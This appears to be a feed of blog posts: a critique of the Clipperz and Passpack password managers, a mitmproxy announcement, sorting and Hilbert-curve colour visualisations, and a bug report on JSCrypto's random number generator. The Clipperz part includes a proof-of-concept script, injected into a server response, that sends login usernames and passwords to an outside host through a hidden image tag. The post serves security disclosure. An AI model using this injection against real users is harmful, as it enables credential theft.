#FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">throw</span><span style="color: #032F62;"> &#39;allowScriptTagRemoting is false.&#39;</span><span>;</span></span> <span class="giallo-l"><span style="color: #6A737D;">//#DWR-INSERT</span></span> <span class="giallo-l"><span style="color: #6A737D;">//#DWR-REPLY</span></span> <span class="giallo-l"><span style="color: #D73A49;">var</span><span> s0</span><span style="color: #D73A49;">=</span><span>{};</span><span style="color: #D73A49;">var</span><span> s1</span><span style="color: #D73A49;">=</span><span>{};s0.result</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;done&quot;</span><span>;s0.lock</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;4EB1C567-7FFE-928D-E0C8-11AF8870DE57&quot;</span><span>;</span></span> <span class="giallo-l"><span>s1.requestType</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;MESSAGE&quot;</span><span>;s1.targetValue</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;blahblah&quot;</span><span>;s1.cost</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">2</span><span>;</span></span> <span class="giallo-l"><span>dwr.engine.</span><span style="color: #6F42C1;">_remoteHandleCallback</span><span>(</span><span style="color: #032F62;">&#39;5&#39;</span><span>,</span><span style="color: #032F62;">&#39;0&#39;</span><span>,{result:s0,toll:s1});</span></span></code></pre> <p>Don't let the <strong>throw</strong> at the top of the snippet fool you. That gets stripped off by the client-side code, and the remainder of the snippet is then run by the client-side application. Yes, folks: Clipperz uses <a rel="external" href="http://directwebremoting.org/dwr/index.html">DWR</a>, which means that the Clipperz server sends little chunks of Javascript back to the browser, which are then eval-ed in the password manager's context. This means that the application is <em>designed</em> to let the supposedly untrusted server execute arbitrary code in the secure environment that contains your S00P3R S3KR3T data. So all their work to make their application verifiable and all the effort expended to publish their code for review is worth exactly bupkis.</p> <p>Facepalm.</p> <p>To prove that this isn't an academic issue, here's a trivial exploit showing how someone in control of the Clipperz server could access a user's private data even if they went to the effort of verifying the application checksum. <strong>WARNING:</strong> Doing this using your real Clipperz credentials will make your username and password appear in my webserver logs! If you're following along with mitmproxy, you need to set an intercept on responses from Clipperz ("i" for intercept, and use the pattern "~s ~u clipperz"). And then add the following lines of code to the first server response after you click the "login" button, just below the "#DWR-REPLY" marker:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">var</span><span> f</span><span style="color: #D73A49;"> =</span><span style="color: #6F42C1;"> getElementsByTagAndClassName</span><span>(</span><span style="color: #032F62;">&quot;input&quot;</span><span>,</span><span style="color: #032F62;"> &quot;loginFormField&quot;</span><span>);</span></span> <span class="giallo-l"><span style="color: #D73A49;">var</span><span> s</span><span style="color: #D73A49;"> =</span><span style="color: #032F62;"> &quot;http://corte.si/sploit/&quot;</span><span>;</span></span> <span class="giallo-l"><span style="color: #D73A49;">for</span><span> (</span><span style="color: #D73A49;">var</span><span> i</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">0</span><span>; i</span><span style="color: #D73A49;"> &lt;</span><span> f.</span><span style="color: #005CC5;">length</span><span>; i</span><span style="color: #D73A49;">++</span><span>){s</span><span style="color: #D73A49;"> =</span><span> s</span><span style="color: #D73A49;"> +</span><span> f[i].value</span><span style="color: #D73A49;"> +</span><span style="color: #032F62;"> &quot;::&quot;</span><span>;}</span></span> <span class="giallo-l"><span style="color: #D73A49;">var</span><span> e</span><span style="color: #D73A49;"> =</span><span style="color: #6F42C1;"> IMG</span><span>({</span><span style="color: #032F62;">&quot;src&quot;</span><span>: s,</span><span style="color: #032F62;"> &quot;height&quot;</span><span>:</span><span style="color: #032F62;"> &quot;0px&quot;</span><span>,</span><span style="color: #032F62;"> &quot;width&quot;</span><span>:</span><span style="color: #032F62;"> &quot;0px&quot;</span><span>});</span></span> <span class="giallo-l"><span style="color: #6F42C1;">appendChildNodes</span><span>(</span><span style="color: #6F42C1;">$</span><span>(</span><span style="color: #032F62;">&quot;header&quot;</span><span>), e);</span></span></code></pre> <p>This rough and ready snippet simply adds an invisible image tag to the page, which loads a bogus image that includes the username and password in the source path. Image sources aren't constrained by the same origin policy, so we can send this data wherever we like - in this case, the server my blog is hosted on. The login process will continue as usual, and unless the user is watching their network traffic carefully, they'll be none the wiser.</p> <h2 id="don-t-worry-clipperz-passpack-does-it-wrong-too">Don't worry Clipperz, Passpack does it wrong too</h2> <p>The other big contender in the host-proof application space is Clipperz' slicker-looking rival, <a rel="external" href="http://www.passpack.com">Passpack</a>. A glance at their security page shows that they definitely refer to themselves as applying the "host-proof hosting" pattern. Their <a rel="external" href="https://www.passpack.com/en/faq/">FAQ</a> makes the typical strong security claim:</p> <blockquote> <p><strong>Can Passpack read my passwords?</strong></p> <p>Not even if we wanted to. It's not possible.</p> </blockquote> <p>Not possible, eh? Well, lets see.</p> <h3 id="1-verification-1">1: Verification</h3> <p>Passpack has completely punted on the verification issue. They don't publish any checksums, they don't publish their source, and their application is split up into innumerable components that would make verification a nightmare. In a blog post <a rel="external" href="http://blog.passpack.com/2007/04/passpack-and-clipperz-the-difference">comparing themselves with Clipperz</a>, they make clear that this is a conscious choice on their part, not an oversight. In fact, they level the same criticism at the Clipperz verification process that I do. Clipperz publishes their verification package right on their homepage:</p> <blockquote> <p>However, if I am in a phished version of Clipperz, it's a moot point because the phisherman can falsify those values as well so that they match his spoofed version.</p> </blockquote> <p>This misses the point of the checksum somewhat - we're not trying to protect against phishing, but against a malicious server - but the criticism is valid none the less. Passpack is also right that the Clipperz checksum verification process is too cumbersome:</p> <blockquote> <p>I just don't think anyone would really do that - always, every single time, many times a day.</p> </blockquote> <p>Quite so. But instead of trying compete with Clipperz by doing a better job on these points, Passpack gave up - they only publish a checksum for the offline version of their application. This is a disastrous decision. Passpack users are compelled to execute whatever the server passes them, without any verification or review. If this was a sudden-death match, that would be Passpack pretty much done right there.</p> <h3 id="2-client-side-security-1">2: Client-side security</h3> <p>But even if they <em>did</em> have a verification mechanism, it still wouldn't help. Firing up mitmproxy, our first look at the traffic seems promising. During the login process we see JSON snippets - which can be deserialized safely - being passed to and fro, rather than chunks of Javascript. Then we notice that the news pane comes through as a chunk of HTML. When we edit the response to add a &lt;script&gt; tag, it gets executed. Furthermore, when we click on any of the menu buttons, gobs of Javascript are pumped into the client app and merrily evaluated. I stopped looking at the application at this point. There's no point showing an example of how someone in control of the server could exploit this situation, because it's clear that preventing script injection is simply not a design goal of the Passpack project. So, that's 0 for 2 for Passpack.</p> <h2 id="the-emperor-sure-looks-naked-to-me">The emperor sure looks naked to me</h2> <p>I want to make it clear that I wish both these projects well. Their founders have thrown their hats into the ring, and had the stones to try to make the host-proof application paradigm work in a commercial setting. Both projects have published significant libraries for building host-proof apps (see the <a rel="external" href="http://www.clipperz.com/open_source/javascript_crypto_library">Clipperz Javascript Crypto Library</a>, and the <a rel="external" href="http://www.passpack.com/en/credits/">Passpack Host-Proof Hosting Library</a>) that will undoubtedly make the road easier for those who follow in their footsteps. It's in the interest of all freedom-loving citizens of the Internet that both these companies prosper, because we need more host-proof applications, not fewer. However...</p> <p>Without a client-side that is both secure <strong>and</strong> verified in the sense I describe above, an application simply isn't "host-proof" in any meaningful sense. If your application is designed in such a way that you can simply <strong>ask</strong> your user's browser for their private data, you can't say "we couldn't access your data even if we wanted to", and you can't say "we've designed our system so that you don't have to trust us". Now, I can anticipate some of the response to this statement - people will say that checksum verification isn't practical, that users wouldn't bother, that an application that sticks rigorously to the host-proof application principles would be unusable. This might all be true - but is beside the point. The truth is, if someone hacked the Clipperz or Passpack servers, they <strong>could</strong> steal bank details or server passwords or whatever else people keep in their lockers - so we're relying on the hosts to be secure. And like Google and Facebook, Clipperz and Passpack <strong>could</strong> access their users' private data - they're just promising that they won't. Just like everybody else, really.</p> <p>Luckily, the steps required to fix things are clear. Clipperz made a critical mistake in choosing DWR for their client-server communications, but that can be rectified. Passpack needs to abandon its misguided idea that no verification of the client-side application is needed, and do the work to make this possible. Passpack already uses JSON for most of its communication - if they used it consistently for all server communication, their client-side app could be on solid ground. Both projects need to put on their thinking caps, and come up with a better way to approach the client-side verification problem. I'm hopeful that we'll see improvements from both projects in response to this post.</p> <h2 id="up-next-building-a-minimal-host-proof-application">Up next: building a minimal host-proof application</h2> <p>All of this started off the exhaustingly monomaniacal hamster-on-a-wheel that I have where other people have a brain. I found myself awake at 3am, thinking about host-proof apps, and pondering the ineluctable modalities of the verification problem. So, I decided to spend some time building a minimal useful host-proof application to experiment with. Tune in next week for my next thrilling post, where I build and launch a tiny, experimental and unashamedly user-hostile host-proof app.</p> Introducing mitmproxy: an interactive man-in-the-middle proxy 2010-02-16T00:00:00+00:00 2010-02-16T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_1/ <h1> Update: see <a href="http://mitmproxy.org">mitmproxy.org</a> for recent releases!</h1> <p>I spend a lot of time poking at web interfaces, both for penetration testing and generally while developing software. This usually involves iteratively making small modifications to requests, and running them again and again until I find a vulnerability or reproduce a bug. Using a browser plugin like <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/966">tamperdata</a> is great for a quick first stab at things, but gets clunky quickly. Scripting things up is usually the next step, and that's fine, but time-consuming and not very agile.</p> <div class="media"> <a href="mitmproxy-screenshot.png"> <img src="mitmproxy-screenshot.png" /> </a> </div> <p>So, I'm releasing <strong>mitmproxy</strong> - an interactive, SSL-aware man-in-the-middle proxy that lets you view, modify and replay HTTP connections. It's aimed at software developers and penetration testers (i.e. people like me), who need to intensively tamper with and monitor HTTP traffic. Using it, you can point your browser at a page that loads a bazillion images and 50 snippets of JSON, pick out the one request you're interested in, and modify and replay it over and over. You have complete control over both requests and responses - you can edit headers and content using your preferred text editor, and change HTTP request methods on the fly. You can view request and response contents using an external viewer (picked using your mailcap configuration), or using <strong>mitmproxy</strong>'s built in text and hexdump-like viewers. Filters and intercepts are specified using regular expressions and a pretty complete mutt-like expression language.</p> <p>Another useful feature is something I call "sticky cookies". I often need to make requests using an authenticated session. This is a pain when logins are action. Copying cookie values around or scripting up the login process gets old quick. So, <strong>mitmproxy</strong> lets you set cookies on requests matching a specified expression as "sticky", which means that requests without a cookie inherit previously seen cookie values. So, you can log in to the target site once using your browser, and subsequent requests using tools like <strong>curl</strong> will automagically look like they're part of an authenticated session.</p> <p>I've just sliced <strong>mitmproxy</strong> raw and quivering out of a much larger internal problems.</p> <p>You can find releases and documentation for <strong>mitmproxy</strong> <a rel="external" href="http://mitmproxy.org">here</a>. As usual, the real action is at the project's <a rel="external" href="http://github.com/cortesi/mitmproxy">git repository</a>.</p> Timsort - a study in grayscale 2010-01-28T00:00:00+00:00 2010-01-28T00:00:00+00:00 https://corte.si/posts/code/timsort-grayscale/ <div class="media"> <a href="timsort.png"> <img src="timsort.png" /> </a> </div> <p>A <a href="https://corte.si/posts/code/sortvis-fruitsalad/">couple of days ago</a> I published a set of explosion-in-a-crayola-factory colourful sorting algorithm visualisations, using a colour sequence generated with the Hilbert curve. The idea was that using a space-filling curve to traverse the RGB colour cube we could get a large number of distinct but visually ordered colours. I contrasted this with a more common method, which is to vary the intensity of a monotone to generate a gradient of colours. A couple of people suggested that I provide a set of grayscale images for comparison. I was curious about this too, so I hacked a grayscale generator into <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a>. The results were striking, but not interesting enough to reproduce here in full. Subjectively, I think the coloured images do allow you to follow more of the detail in these dense visualisations, but I'm not wedded to the idea. Being able to visually judge the order of elements in a sorting algorithm visualisation is important, and that is something we sacrifice in the Hilbert RGB traversal. I still like my <a href="https://corte.si/posts/code/visualisingsorting/">earlier sparse grayscale visualisations</a> best.</p> <p>If you're curious, you can check out <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a> and generate the full set of grayscale graphs with the following command:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>./dense -g -n 512</span></span></code></pre> <p>I did think the grayscale version of Python's <a href="https://corte.si/posts/code/timsort/">Timsort</a> was worth sharing. It's pretty spectacular due to a purely coincidental 3d effect - not much good for explaining Timsort, but I'd hang it on my wall, for sure.</p> Hilbert Curve + Sorting Algorithms + Procrastination = ? 2010-01-26T00:00:00+00:00 2010-01-26T00:00:00+00:00 https://corte.si/posts/code/sortvis-fruitsalad/ <p>I like the Hilbert curve. I like sorting algorithm visualisations. I occasionally procrastinate when I should be doing more important things. When all these factors converge, the result is a post like this.</p> <p>In a <a href="https://corte.si/posts/code/hilbert/portrait/">previous post</a>, I drew a picture of a Hilbert curve by projecting a Hilbert curve traversal of the RGB colour cube onto a Hilbert curve traversal of the plane (yes, it's a mouthful, but it's a mouthful of awesome). Since then, I've been pondering the general utility of Hilbert curve traversals of the colour cube. In large-scale visualisation, we often want to choose an ordered sequence of colours that have the property that colours close to each other on the sequence are also close to each other visually. The easy way to do this is to restrict yourself to a specific hue, and to vary the intensity. I used this idea in grayscale to generate some previous <a href="https://corte.si/posts/code/visualisingsorting/">sorting algorithm visualisations</a>:</p> <div class="media"> <a href="insertionsort.png"> <img src="insertionsort.png" /> </a> <div class="subtitle"> Insertion sort </div> </div> <p>The problem with this approach is that it hugely restricts the number of distinct colours we can use. There are only so many distinct shades of gray the human eye can perceive - I'm already pushing it with 20 distinct colours in the image above. We can do much, much better using the Hilbert curve. Lets assume that human perception of RGB colours is uniform and consistent - that is, that any change along the RGB axes will result in uniformly proportional difference in perceived colour. This assumption is incorrect, but it's good enough as a first approximation. By traversing the RGB colour cube in Hilbert order, we can get a set of colours that are maximally distinct from each other, with near-optimal colour locality preservation (keeping in mind that perfect locality preservation is impossible). In other words, an equidistant sequence of colours that are simultaneously as different from each other as possible, and where colours 'close' to each other on the sequence are as similar as possible. The result is a colour sequence that looks like this:</p> <div class="media"> <a href="swatch.png"> <img src="swatch.png" /> </a> <div class="subtitle"> 512-colour Hilbert-order swatch </div> </div> <p>We do, of course, pay a price for this mathematical marvel: we can't visually compare colours and see their order in the spectrum. When we really want a large ordered sequence of colours, this can be an acceptable tradeoff.</p> <p>Below is a re-imagining of my previous sorting algorithm visualisations, at a much larger scale than I could achieve using shades of gray. Each image shows a random list of 512 elements being sorted. The images are at a 1-pixel per element resolution, and each element has a distinct colour along the Hilbert RGB cube traversal. The aspect ratios differ, because the width of the images are equal to the number of element swaps that occur during the sorting process. I've left out a number of algorithms that end up being too "wide" to be enjoyable - shellsort and bubblesort, I'm looking at you. Oh, and I make absolutely no claims that these particular visualisations are useful or informative. I made them for the same reason Mallory climbed Everest and the chicken crossed the road: because it's there, and to see what's on the other side. Come to think of it, the Mallory-Chicken Impetus explains rather a lot of what I do.</p> <h3 id="selection-sort">Selection sort</h3> <div class="media"> <a href="selectionsort.png"> <img src="selectionsort.png" /> </a> <div class="subtitle"> Selection sort </div> </div><h2 id="insertion-sort">Insertion sort</h2> <div class="media"> <a href="insertionsort.png"> <img src="insertionsort.png" /> </a> <div class="subtitle"> Insertion sort </div> </div><h3 id="python-s-timsort">Python's Timsort</h3> <p>I explained the pattern you see below in a <a href="https://corte.si/posts/code/timsort/">previous post visualising Timsort</a>.</p> <div class="media"> <a href="timsort.png"> <img src="timsort-small.png" /> </a> <div class="subtitle"> Timsort </div> </div><h3 id="quicksort">Quicksort</h3> <div class="media"> <a href="quicksort.png"> <img src="quicksort-small.png" /> </a> <div class="subtitle"> Quicksort </div> </div><h2 id="the-code">The code</h2> <p>As usual, I've published the code used to draw the images in this post. I extended <a rel="external" href="http://github.com/cortesi/scurve">scurve</a>, where I'm collecting algorithms and visualisation techniques related to space-filling curves, to draw colour swatches. Then I added added a "fruitsalad" visualisation technique to <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a>, which houses my sorting algorithm visualisation code.</p> An email to the authors of JSCrypto 2010-01-14T00:00:00+00:00 2010-01-14T00:00:00+00:00 https://corte.si/posts/security/jscrypto/ <div class="media"> <a href="facepalm.jpg"> <img src="facepalm.jpg" /> </a> </div> <p><strong>[Update: A fix for these problems and one noted by Peter Burns in the comments to this post has been posted. <a rel="external" href="http://crypto.stanford.edu/sjcl/">Get it while it's hot</a>, folks.]</strong></p> <p>Hi folks,</p> <p>Thanks for a <a rel="external" href="http://crypto.stanford.edu/sjcl/">blazingly fast little crypto library</a>. Please find below a few comments on the code.</p> <p>There's an error in the <strong>is_ready</strong> function of the random number generator. On line 1386 of the <strong>jscrypto.js</strong> file, you have:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">return</span><span> (</span><span style="color: #005CC5;">this</span><span>._pool_entropy[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._BITS_PER_RESEED</span><span style="color: #D73A49;"> &amp;&amp;</span></span> <span class="giallo-l"><span style="color: #D73A49;">new</span><span> Date.</span><span style="color: #6F42C1;">valueOf</span><span>()</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._next_reseed)</span><span style="color: #D73A49;"> ?</span></span></code></pre> <p>This should be:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">return</span><span> (</span><span style="color: #005CC5;">this</span><span>._pool_entropy[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._BITS_PER_RESEED</span><span style="color: #D73A49;"> &amp;&amp;</span></span> <span class="giallo-l"><span style="color: #D73A49;">new</span><span style="color: #6F42C1;"> Date</span><span>().</span><span style="color: #6F42C1;">valueOf</span><span>()</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._next_reseed)</span><span style="color: #D73A49;"> ?</span></span></code></pre> <p>In Safari, this will cause an error and script termination. In Firefox, the effect is much worse - <b>new Date.valueOf()</b> returns an object, which never compares as greater than any integer. As an unfortunate consequence, that clause can never evaluate to true, and your <a href="http://en.wikipedia.org/wiki/Fortuna_(PRNG)">Fortuna</a> implementation's periodic reseeding never triggers...</p> <p>All is not lost, though, because luckily the <strong>random_words</strong> function in which the return value from <strong>is_ready</strong> is used makes no sense. ;-) To start with, on line 1289 you have:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (readiness</span><span style="color: #D73A49;"> ==</span><span style="color: #005CC5;"> this</span><span>.</span><span style="color: #005CC5;">NOT_READY</span><span>)</span></span></code></pre> <p>But readiness here is a bit field, and this clause will evaluate to false in half the situations that <strong>is_ready</strong> actually does return NOT_READY. You surely want</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (readiness</span><span style="color: #D73A49;"> &amp;</span><span style="color: #005CC5;"> this</span><span>.</span><span style="color: #005CC5;">NOT_READY</span><span>)</span></span></code></pre> <p>Three lines further down, you have:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">else if</span><span> (readiness</span><span style="color: #D73A49;"> &amp;&amp;</span><span style="color: #005CC5;"> this</span><span>.</span><span style="color: #005CC5;">REQUIRES_RESEED</span><span>)</span></span></code></pre> <p>This, again, doesn't do what it seems - &amp;&amp; is the boolean and, not the bitwise and. Since <strong>this.REQUIRES_RESEED</strong> is simply a positive constant, that really becomes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">else if</span><span> (readiness)</span></span></code></pre> <p>So despite the bug in <strong>is_ready</strong>, your reseeding function actually runs every time random data is requested. Phew - who says two wrongs don't make a right, ey? Reseeding every time data is requested might open the generator to some interesting entropy exhaustion attacks, but is much better than not reseeding at all.</p> <p>A corollary to all this is that you also need to address the fact that the the return value from <strong>is_ready</strong> is used incorrectly in the rest of your code and your examples. As it stands, testing for readiness with</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (Random.</span><span style="color: #6F42C1;">is_ready</span><span>())</span></span></code></pre> <p>is wrong, because your readiness function can return <strong>REQUIRES_RESEED | NOT_READY</strong>, which is a positive integer. I'd recommend changing the interface of <strong>is_ready</strong> to have an obvious boolean return value instead, though - typing</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (Random.</span><span style="color: #6F42C1;">is_ready</span><span>()</span><span style="color: #D73A49;"> &amp;</span><span> Random.</span><span style="color: #005CC5;">IS_READY</span><span>)</span></span></code></pre> <p>is a bit of a mouthful.</p> <p>Thanks again for jscrypto.</p> <br/> <br/> <p>Regards,</p> <br/> <p>Aldo</p> <p><strong>[No animals were harmed producing this post. Content lightly edited for markup and formatting from the original email. Yes, I really do like JSCrypto - this error-hiding-an-error was amusing, but the AES implementation seems good (although the jury's still out on the SHA256 portion).]</strong></p> Generating colour maps with space-filling curves 2010-01-07T00:00:00+00:00 2010-01-07T00:00:00+00:00 https://corte.si/posts/code/hilbert/swatches/ <p>After my post about my <a href="https://corte.si/posts/code/hilbert/portrait/">Quixotic quest to draw a portrait of the Hilbert curve</a>, Chris Mueller pointed me to some <a rel="external" href="http://visualmotive.com/colorsort/">fascinating related work</a> he had done generating colour maps of images. Chris's method was to extract the colours from an image, sort them in natural order, and then draw the pixels out onto a Hilbert curve. The results are pretty, but have a blotchiness that demonstrates the poor clustering properties of a natural order sort nicely. If you've read my previous post (you have, haven't you?), you'll be immediately struck by the idea that we can improve this by sorting the pixels in order of the 3d Hilbert curve traversal of the RGB colour cube (you were, weren't you?). This would give us near optimal clustering, keeping similar colours together and eliminating the blotchiness. If we have a Hilbert-order sorting of the pixels, we can also project this onto other traversals of the pixels of the destination image. Using the ZigZag curve I introduced in the previous post produces a very nice result too, showing that the order in which the RGB cube is traversed is more important than the destination map.</p> <p>In the images below, <strong>natural</strong> is a natural-order colour sort projected onto a Hilbert curve (Chris's method), <strong>hilbert</strong> is a Hilbert-curve order colour</p> <p>sort projected onto a Hilbert curve, and <strong>zigzag</strong> is a Hilbert-curve order colour sort projected onto a ZigZag curve. I've used the same images Chris used to make comparison with his other interesting visualisations easy.</p> <div class="media left"> <a href="original_candleslime.png"> <img src="original_candleslime.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_candleslime.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_candleslime.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_candleslime.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_girlpeach.png"> <img src="original_girlpeach.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_girlpeach.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_girlpeach.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_girlpeach.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_landscape.png"> <img src="original_landscape.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_landscape.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_landscape.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_landscape.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_tents.png"> <img src="original_tents.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_tents.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_tents.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_tents.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_tigersnack.png"> <img src="original_tigersnack.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_tigersnack.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_tigersnack.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_tigersnack.png"/> <div>zigzag</div> </div> </div> </div> <h2 id="sources">Sources</h2> <p>The images are from the Flickr Creative Commons collection. The tiger image is © <a rel="external" href="http://www.flickr.com/photos/nikonvscanon/2427517125/">David Blaikie</a>. The girl image is © <a rel="external" href="http://www.flickr.com/photos/savannahgrandfather/312427606/">Bruce Tuten</a>. The still life is © <a rel="external" href="http://www.flickr.com/photos/8363028@N08/3077370592/in/photostream/">DeusXFlorida</a>. The beach image is © <a rel="external" href="http://www.flickr.com/photos/hamed/2476599906/">Hamed Saber</a>. The tent image is © <a rel="external" href="http://www.flickr.com/photos/drusbi/1318108463/">drusbi</a>.</p> <h2 id="the-code">The code</h2> <p>I've updated the <a rel="external" href="http://github.com/cortesi/scurve">scurve</a> project (where I'm collecting algorithms and visualisation tools related to space-filling curves) to include a "colormap" tool to generate colour maps. The images above were can be generated using commands of the following form:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;"> colormap</span><span style="color: #005CC5;"> -s 128 -c</span><span> [colour</span><span style="color: #032F62;"> traversal]</span><span style="color: #005CC5;"> -m</span><span> [map] src destination</span></span></code></pre> <p>There are a lot of other striking permutations and combinations to explore - the colour traversal and destination map can be any of the space-filling curves supported by <strong>scurve</strong>.</p> Portrait of the Hilbert curve 2010-01-03T00:00:00+00:00 2010-01-03T00:00:00+00:00 https://corte.si/posts/code/hilbert/portrait/ <div class="media"> <a href="hilbert2d-o4.png"> <img src="hilbert2d-o4.png" /> </a> <div class="subtitle"> Hilbert curve of order 4 </div> </div> <p>The <a rel="external" href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert curve</a> is a remarkable construct in many ways, but the thing that makes it <em>useful</em> in computer science is the fact that it has good clustering properties. If we take a curve like the one above and straighten it out, points that are close together in the two-dimensional layout will also tend to be close together in the linear sequence. I say "tend to be", because we can never get this perfectly right - we can show that any curve of this type will have some points that are close to each other spatially but far from each other on the curve. <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.37.3138&amp;rep=rep1&amp;type=pdf">It</a> <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.129.1888&amp;rep=rep1&amp;type=pdf">turns</a> <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.24.8236&amp;rep=rep1&amp;type=pdf">out</a>, however, that the clustering behaviour of the Hilbert curve is pretty much as good as we can currently get. For one example of how this property can be useful, imagine that we have a database with two indexes - X and Y. We know that we will be doing frequent queries on those indexes, asking for records where X and Y fall within specified ranges. We can visualise this as retrieving rectangular regions from a two-dimensional space. Given this scenario, how can we lay out the records on disk to minimise disk access? Information on disk is stored sequentially, so what we want is a layout that maximises the likelihood that records in any given rectangular region will also be adjacent on disk. In other words, what we want is a way to order our two-dimensional space of records so that records close to each other in two dimensions also tend to be close to each other in the sequential order. This is exactly the outstanding property of the Hilbert curve, so one solution is to store our records on disk in Hilbert order.</p> <h2 id="visualising-the-hilbert-curve-a-first-stab">Visualising the Hilbert curve: A first stab</h2> <p>I've long felt that the usual visualisation of the Hilbert curve - like the one shown at the top of this post - doesn't really do its clustering properties justice. The lines-and-vertices approach demonstrates how to <em>construct</em> the curve very nicely, but it doesn't give us any intuitive feel for how close points on the curve are to each other on the plane. In the remainder of this post, I take a stab at visualising the Hilbert curve as the great mathematician in the sky intended - completely covering the plane, and with each pixel visually encoding its proximity to its neighbours along the curve.</p> <p>One way to proceed would be to find a way to assign a colour every pixel in a Hilbert-order traversal of a square image. Imagine the RGB colour space as a cube where each colour is uniquely identified by a set of (r, g, b) co-ordinates. Here's one with 20 colours to a side:</p> <div class="media"> <a href="ccube.png"> <img src="ccube.png" /> </a> <div class="subtitle"> A 20x20x20 RGB colour cube </div> </div> <p>We'll use a somewhat larger colour cube - 256 colours to a side, giving us 16 777 216 unique colours. This colour cube is familiar to pretty much everyone, since it's precisely the colour space we use when we specify HTML-style #rrggbb colours. We can project the RGB colour cube at 1:1 resolution onto a square with 4096 pixels to a side - this exactly matches a Hilbert curve of order 12. Now we need a method for traversing the colours in the colour cube. One trivial way to do this is to simply snake through all the points in the cube. In two dimensions, it would look like this:</p> <div class="media"> <a href="zigzag-o4.png"> <img src="zigzag-o4.png" /> </a> <div class="subtitle"> 16x16 Zigzag </div> </div> <p>This generalises to 3 or more dimensions easily - just imagine "stacking" plates of two-dimensional traversals in such a way that one plate's end point is adjacent to the next plate's starting point. For want of a better term, I've called this Zigzag order. When we project a Zigzag traversal of the RGB colourspace onto a Hilbert-order traversal of the plane, we get this:</p> <div class="media"> <a href="hilbert-zigzag-fullsize.png"> <img src="hilbert-zigzag-small.png" /> </a> <div class="subtitle"> Zigzag on Hilbert </div> </div> <p>That's... ugly. You can vaguely make out the shape of the Hilbert curve by dividing the image into quadrants, and traversing them in the order in which they blend into each other. But there's a problem - if we traverse the RGB colour space in Zigzag order, many colours that are close to each other in 3d space - and therefore visually similar - are quite far from each other in our traversal order. This is what causes the blotchy artifacts in the image above. What we really want is a traversal of the RGB colour space that is as smooth and continuous as possible - meaning that colours that are close to each other in the cube are also as close as possible to each other in the traversal order. Wait a minute... that sounds familiar, doesn't it?</p> <h2 id="drawing-the-hilbert-curve-in-n-dimensions">Drawing the Hilbert curve in N dimensions</h2> <p>What we really want is a 3d Hilbert curve traversal of the RGB colour cube. This would mean that our colour clustering - making sure that similar colours are as close as possible to each other in the sequence - would be close to optimal. We should then see the clustering properties of the 2d Hilbert curve as patches of similar colour. So, does a 3d analogue to the Hilbert curve exist? Sure it does - here's a 